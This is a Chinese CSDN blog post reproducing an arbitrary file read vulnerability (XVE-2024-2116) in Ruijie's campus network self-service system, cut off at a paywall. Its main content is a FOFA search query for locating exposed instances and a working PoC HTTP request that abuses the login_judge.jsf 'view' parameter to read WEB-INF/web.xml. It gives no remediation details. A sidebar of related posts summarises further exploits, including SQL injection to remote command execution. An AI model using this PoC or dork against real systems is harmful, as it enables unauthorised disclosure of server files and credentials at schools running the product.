锐捷校园网自助服务系统 login_judge.jsf 任意文件读取漏洞复现(XVE-2024-2116)

已于 2024-06-06 15:06:51 修改
阅读量664 收藏 1
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-06-06 15:05:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139500864
版权

0x01 产品简介

锐捷校园网自助服务系统是锐捷网络推出的一款面向学校和校园网络管理的解决方案。该系统旨在提供便捷的网络自助服务,使学生、教职员工和网络管理员能够更好地管理和利用校园网络资源。

0x02 漏洞概述

校园网自助服务系统/selfservice/selfservice/module/scgroup/web/login_judge.jsf 接口处存在任意文件读取漏洞,经过分析和研判,该漏洞利用难度低,可导致敏感信息泄漏,建议尽快修复。

0x03 复现环境

FOFA:body="校园网自助服务系统"

0x04 漏洞复现

PoC

GET /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
锐捷校园网自助服务系统 operatorReportorRoamService SQL注入漏洞致RCE漏洞复现
0xSec
04-22 1158
锐捷校园网自助服务系统 operatorReportorRoamService 接口存在SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库操作权限,进一步利用os-shell可实现远程命令执行,存在服务器被控的风险。
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 589
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 768
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
1day 锐捷校园网自助服务系统存在SQL注入漏洞-新街口
weixin_43167326的博客
04-24 988
锐捷校园网自助服务系统是为学校网络管理而设计的平台,提供网络账号管理、流量查询、上网认证、网络报修和网络使用规则说明等功能,以提高学校网络管理效率,方便用户管理和使用校园网络资源、
暴力解学校联通上网密码—_—!!
cike14的专栏
08-10 1447
——
锐捷自动定时启动,开机自动认证校园网 教程
weixin_45635130的博客
10-21 3034
前言 因为把锐捷快捷方式放到开机启动项没用,所以研究一下发现一个更好的解决方法。 你的锐捷必须认证过而且勾选了自动认证 教程 win键搜索任务计划程序 打开,在windows创建任务: 触发器选择定时启动的时间,如每天早上7点,常规设置如下: 操作中新建,选择启动程序,选择你的锐捷安装路径: 条件中选择这两个选项实现开机启动: 如果你也是不经常关机的人,那你还要做下面的操作: 因为这个自动任务是在后台静默启动,本来锐捷不支持启动两个的,那么你在断网后没有关闭锐捷,第二天就没办法执行自动任务(其实是执
漏洞复现锐捷校园网自助服务系统 login_judge.jsf 任意文件读取漏洞(XVE-2024-2116)
siu~
06-06 554
校园网自助服务系统/selfservice/selfservice/module/scaroup/web/login judae.jsf 接囗处存在任意文件读取漏洞 ,经过分析和研判,该漏洞利用难度低,可导致敏感信息泄漏,建议尽快修复。
漏洞复现锐捷校园网自助服务系统 login_judge.jsf 任意文件读取漏洞(XVE-2024-2116)
qq_39894062的博客
06-08 421
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
1day 锐捷校园网自助服务系统selfservice任意文件下载漏洞
weixin_43167326的博客
06-07 458
锐捷校园网自助服务系统锐捷网络推出的一款面向学校和校园网络管理的解决方案。该系统旨在提供便捷的网络自助服务,使学生、教职员工和网络管理员能够更好地管理和利用校园网络资源。 ​
校园网认证客户端_锐捷_Supplicant_For_Windows_V6.82.zip
08-30
锐捷网络是一家知名的网络设备和服务提供商,其产品广泛应用于各类教育机构、企业及政府单位,尤其是在校园网领域有着深入的应用。"校园网认证客户端_锐捷_Supplicant_For_Windows_V6.82.zip" 是锐捷为Windows操作...
X86_64平台mentohust锐捷openwrt-lede安装包,用于校园网拨号上网.rar
07-24
X86_64平台锐捷openwrt/lede安装包,用于校园网拨号上网 不是路由器上用的,是64位电脑上用的!在命令行用以下命令安装~ 不是路由器上用的,是64位电脑上用的!在命令行用以下命令安装~ 不是路由器上用的,是64位...
锐捷模拟器镜像导入流程-2024.pdf
07-09
锐捷模拟器镜像导入流程-2024.pdf,为了让工程师有机会在没有真机设备的情况下,学习网络技术和原理,动手操作熟悉锐捷设备命令,锐捷网络开发了锐捷设备模拟器RG-NSE(RG-Network Simulation Environmente)。...
RT-AC1200HP-GPIO-12-JI3-128M_3.4.3.9-099.trx
09-03
极路由3老毛子固件,亲测有用,带广告屏蔽功能,锐捷认证功能等等
锐捷防火墙镜像文件-v1.06.zip
最新发布
07-09
锐捷防火墙镜像文件.zip,为了让工程师有机会在没有真机设备的情况下,学习网络技术和原理,动手操作熟悉锐捷设备命令,锐捷网络开发了锐捷设备模拟器RG-NSE(RG-Network Simulation Environmente)。现阶段RG-NSE...
锐捷路由器镜像文件-v1.06.zip
07-09
为了让工程师有机会在没有真机设备的情况下,学习网络技术和原理,动手操作熟悉锐捷设备命令,锐捷网络开发了锐捷设备模拟器RG-NSE(RG-Network Simulation Environmente)。现阶段RG-NSE实现方式为第三方虚拟化平台...
QS-3108-R6-PD32_Driver_Windows_6.708.07.00.zip
04-19
锐捷服务器Raid卡驱动程序是确保服务器硬盘阵列高效运行的关键组件,特别是对于使用LSI 2308和3108型号Raid控制器的用户而言。这些驱动程序是专门为Windows操作系统优化的,旨在提供稳定性和性能,以满足企业级数据...
锐捷网络2024版无线RCNA-WLAN学习资料合集.zip
06-24
锐捷网络2024版无线RCNA-WLAN学习资料合集是一套全面且专业的学习资源,旨在帮助网络专业人士深入理解和掌握锐捷网络在无线局域网(WLAN)领域的技术知识。该合集可能包括了各类教程、实战指南、案例分析、模拟试题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值